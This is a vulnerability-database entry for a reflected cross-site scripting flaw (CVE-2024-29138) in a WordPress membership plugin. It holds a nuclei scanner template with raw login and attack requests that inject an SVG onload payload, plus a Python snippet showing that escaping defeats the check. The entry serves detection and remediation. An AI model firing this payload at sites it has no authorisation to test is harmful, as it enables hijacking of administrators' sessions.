WordPress Restrict User Access <= 2.5 - Cross-Site Scripting

05 Jul 2026 03:01:21, reported by ProjectDiscovery. Type: nuclei. Source: github.com

WordPress Restrict User Access before 2.6 is vulnerable to reflected cross-site scripting.

Code
id: CVE-2024-29138

info:
  name: WordPress Restrict User Access <= 2.5 - Cross-Site Scripting
  author: Shivam Kamboj
  severity: medium
  description: |
    WordPress Restrict User Access – Membership Plugin with Force versions before 2.6 is vulnerable to Reflected Cross-Site Scripting via the '_rua_section' parameter in the admin level edit page.
  impact: |
    Attackers can execute arbitrary scripts in authenticated admin browsers, potentially leading to session hijacking, privilege escalation, WordPress admin account takeover, malicious plugin installation, and website defacement.
  remediation: |
    Update Restrict User Access plugin to version 2.6 or later.
  reference:
    - https://patchstack.com/database/wordpress/plugin/restrict-user-access/vulnerability/wordpress-restrict-user-access-plugin-2-5-reflected-cross-site-scripting-xss-vulnerability
    - https://nvd.nist.gov/vuln/detail/CVE-2024-29138
    - https://wordpress.org/plugins/restrict-user-access/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-29138
    epss-score: 0.00622
    epss-percentile: 0.45452
    cwe-id: CWE-79
  metadata:
    verified: true
    max-request: 2
    fofa-query: body="/plugins/restrict-user-access/"
  tags: cve,cve2024,wordpress,wp,wp-plugin,xss,authenticated,vkev

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

    matchers:
      - type: dsl
        dsl:
          - status_code == 302
          - contains(header, 'wordpress_logged_in')
        condition: and
        internal: true

  - raw:
      - |
        POST /wp-admin/admin.php?page=wprua-level&action=edit HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        level_id=1&_rua_section="><svg onload=alert(document.domain)>

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains_all(body, "\"><svg onload=alert(document.domain)>","restrict-user-access")'
        condition: and
# digest: 4a0a0047304502204f9c92b0fa00a0611ccc0fdcaaa9eefbc753814cd958caf84102c0227bbbed03022100f887d4e50ddc977fae5f53bce429d2b2dbd5f0af7aa2d0fc09c08039f4e46f38:922c64590222798bb761d5b6d8e72950
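To make the second request's matcher concrete, here is an added Python reimplementation (not part of the template above or of the plugin) of its `dsl` checks, run against two constructed responses: one that reflects the `_rua_section` value unescaped, as the vulnerable page does, and one that HTML-attribute-escapes it, which is what a fix such as WordPress's `esc_attr()` achieves. `render_section_field` is an assumed stand-in for the admin page, not the plugin's code.

```python
import html

# Reflected value and markers exactly as the template's second matcher expects.
PAYLOAD = '"><svg onload=alert(document.domain)>'
MARKERS = (PAYLOAD, "restrict-user-access")


def render_section_field(value: str, escape: bool) -> str:
    """Assumed stand-in (not the plugin's code) for the admin level edit page
    that echoes the `_rua_section` parameter into an attribute value.
    escape=False mimics the vulnerable behaviour; escape=True mimics the fix
    (HTML-attribute escaping, as WordPress's esc_attr() performs)."""
    field = html.escape(value, quote=True) if escape else value
    return (
        '<html><body class="restrict-user-access">'
        f'<input type="hidden" name="_rua_section" value="{field}">'
        "</body></html>"
    )


def matches_template(status_code: int, content_type: str, body: str) -> bool:
    """Evaluate the template's request-2 matcher (condition: and):
    status_code == 200, content_type contains text/html,
    body contains_all(payload, "restrict-user-access")."""
    return (
        status_code == 200
        and "text/html" in content_type
        and all(marker in body for marker in MARKERS)
    )


def check_response(escaped: bool) -> bool:
    """Build a constructed 200 text/html response for the vulnerable (escaped=False)
    or patched (escaped=True) page and report whether the matcher would flag it."""
    body = render_section_field(PAYLOAD, escape=escaped)
    return matches_template(200, "text/html; charset=UTF-8", body)


if __name__ == "__main__":
    print("vulnerable page flagged:", check_response(escaped=False))  # True
    print("patched page flagged:   ", check_response(escaped=True))   # False
```

Note that the escaped page still contains the "restrict-user-access" marker; the matcher stays quiet only because `contains_all` also requires the raw payload, which escaping turns into `&quot;&gt;&lt;svg ...`.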


Scores (as of 04 Feb 2026 07:00): Vulners AI Score 7.2 (high risk); CVSS 3.1 6.1 - 7.1; EPSS 0.00622.